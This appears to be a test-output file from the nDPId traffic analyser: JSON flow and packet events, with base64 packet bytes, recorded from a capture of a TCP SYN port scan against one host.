-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs9IQAACgGK+6sEAAIQA2GNIzTAiHdU4MZAAAAAGACBAAyawAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsPqUAACkG4M2sEAAIQA2GNIzTBBvdU4MZAAAAAGACCAAscQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":965,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAs0uwAACgGTYasEAAIQA2GNIzTDkvdU4MZAAAAAGACBAAmQQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsk78AADoGerOsEAAIQA2GNIzTE8TdU4MZAAAAAGACDAAYyAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsgW4AADIGlQSsEAAIQA2GNIzTRnjdU4MZAAAAAGACDADmEwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsvXkAACYGZPmsEAAIQA2GNIzTFADdU4MZAAAAAGACDAAYjAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsehoAADYGmFisEAAIQA2GNIzTAfTdU4MZAAAAAGACDAAqmAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAs6wMAACUGOG+sEAAIQA2GNIzThwvdU4MZAAAAAGACCACpgAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsJQUAADgG622sEAAIQA2GNIzTGuHdU4MZAAAAAGACBAAZqwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":972,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ0wAADYGzyasEAAIQA2GNIzTA4LdU4MZAAAAAGACDAApCgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059962,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":973,"flow_packet_id":1,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059962,"pkt":"ACYLMQczACWzv5HuCABFAAAsO3sAADAG3PesEAAIQA2GNIzTBIzdU4MZAAAAAGACBAAwAAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":974,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsDxoAAC0GDFmsEAAIQA2GNIzTH0rdU4MZAAAAAGACCAARQgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":975,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsJpAAADIG7+KsEAAIQA2GNIzTxnDdU4MZAAAAAGACDABmGwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":976,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsddgAADIGoJqsEAAIQA2GNIzTCP3dU4MZAAAAAGACDAAjjwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9618,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":977,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsId8AADoG7JOsEAAIQA2GNIzTJZLdU4MZAAAAAGACDAAG+gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsc6IAACoGqtCsEAAIQA2GNIzTrZvdU4MZAAAAAGACDAB+8AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAspioAAC0GdUisEAAIQA2GNIzTOGndU4MZAAAAAGACCAD4IgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4279,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":980,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsiV0AADMGjBWsEAAIQA2GNIzTELfdU4MZAAAAAGACEAAX1QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":981,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsDLwAADEGCresEAAIQA2GNIzTH\/TdU4MZAAAAAGACCAAQmAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAslZYAADIGgNysEAAIQA2GNIzTFi\/dU4MZAAAAAGACDAAWXQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsq3UAADsGYf2sEAAIQA2GNIzTA9vdU4MZAAAAAGACEAAksQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":984,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAs8X8AAC4GKPOsEAAIQA2GNIzTHmLdU4MZAAAAAGACDAAOKgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsmB0AADMGfVWsEAAIQA2GNIzSeT7dUoMYAAAAAGACEACvUAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060005,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":986,"flow_packet_id":1,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060005,"pkt":"ACYLMQczACWzv5HuCABFAAAsU8cAACkGy6usEAAIQA2GNIzSLuDdUoMYAAAAAGACCAABrwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":996,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_packet_id":1,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060006,"pkt":"ACYLMQczACWzv5HuCABFAAAsXS0AACwGv0WsEAAIQA2GNIzSKXjdUoMYAAAAAGACBAALFwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 